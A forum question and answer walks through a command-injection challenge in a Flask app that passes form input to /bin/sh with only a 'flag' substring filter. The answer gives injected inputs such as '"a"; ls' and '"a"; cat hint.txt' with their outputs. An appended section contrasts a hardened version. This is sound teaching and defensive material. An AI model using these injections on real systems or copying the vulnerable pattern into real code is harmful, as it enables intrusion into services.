How should I solve this?
Please explain it in detail from the beginning ㅜㅜ
#misc
Author
Answers
1
ɢ3ɴ3s1$
This challenge is related to Command Injection.
```python
import subprocess
from flask import Flask, render_template, request

APP = Flask(__name__)

@APP.route('/', methods=['GET', 'POST'])
def index():
    if request.method == 'POST':
        user_input = request.form.get('user_input')
        # User input is placed inside a command substitution and run by the shell
        cmd = f'echo $({user_input})'
        # Substring filter: any command string containing "flag" is rejected
        if 'flag' in cmd:
            return render_template('index.html', result='No!')
        try:
            output = subprocess.check_output(['/bin/sh', '-c', cmd], timeout=5)
            return render_template('index.html', result=output.decode('utf-8'))
        except subprocess.TimeoutExpired:
            return render_template('index.html', result='Timeout')
        except subprocess.CalledProcessError:
            return render_template('index.html', result='Error')
    return render_template('index.html')
```
As you can see, when you enter any command, the system will run it.
Try using commands to find the flag.
- Enter `"a"; ls`: Result is `app.py dream hint.txt requirements.txt static templates`
- Enter `"a"; cat hint.txt`: Result is `Where is Flag? ./dream/hack/hello`
- Enter `"a"; ls ./dream/hack/hello`: Result is `flag.txt`
- However, if `flag` is in your command, the result is `No!`
I think with this explanation you can do the rest to find the flag.
Good luck!
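For anyone fixing this kind of handler rather than solving it, here is an added example (not part of the answer above or of the challenge's code) that puts the handler's command-building pattern next to a version that never hands the input to a shell. The function names `run_vulnerable` and `run_hardened` are hypothetical, the sample input is constructed in the same shape as the answer's `"a"; ls`, and a POSIX system with `/bin/sh` and `printf` is assumed.

```python
import subprocess


def run_vulnerable(user_input: str) -> str:
    """The handler's pattern: input is spliced into a string that /bin/sh parses."""
    cmd = f'echo $({user_input})'
    if 'flag' in cmd:  # substring filter, as in the handler
        return 'No!'
    try:
        out = subprocess.check_output(['/bin/sh', '-c', cmd],
                                      stderr=subprocess.DEVNULL, timeout=5)
    except subprocess.TimeoutExpired:
        return 'Timeout'
    except subprocess.CalledProcessError:
        return 'Error'
    return out.decode('utf-8')


def run_hardened(user_input: str) -> str:
    """No shell: the input is a single argv element, so it is only ever data."""
    try:
        # The format string is fixed; user_input only fills %s and is never
        # parsed as shell syntax or as a command-line option.
        out = subprocess.check_output(['printf', '%s\n', user_input], timeout=5)
    except subprocess.TimeoutExpired:
        return 'Timeout'
    except (subprocess.CalledProcessError, ValueError):
        # ValueError: input contained a NUL byte, which argv cannot carry
        return 'Error'
    return out.decode('utf-8', errors='replace')


if __name__ == '__main__':
    sample = '"a"; printf INJECTED'  # constructed input, harmless second command
    print(repr(run_vulnerable(sample)))  # the shell ran the second command
    print(repr(run_hardened(sample)))    # the input came back as literal text
```

The hardened version drops the substring filter because nothing interprets the input any more; a blocklist applied to a string that a shell will later parse is not a security boundary.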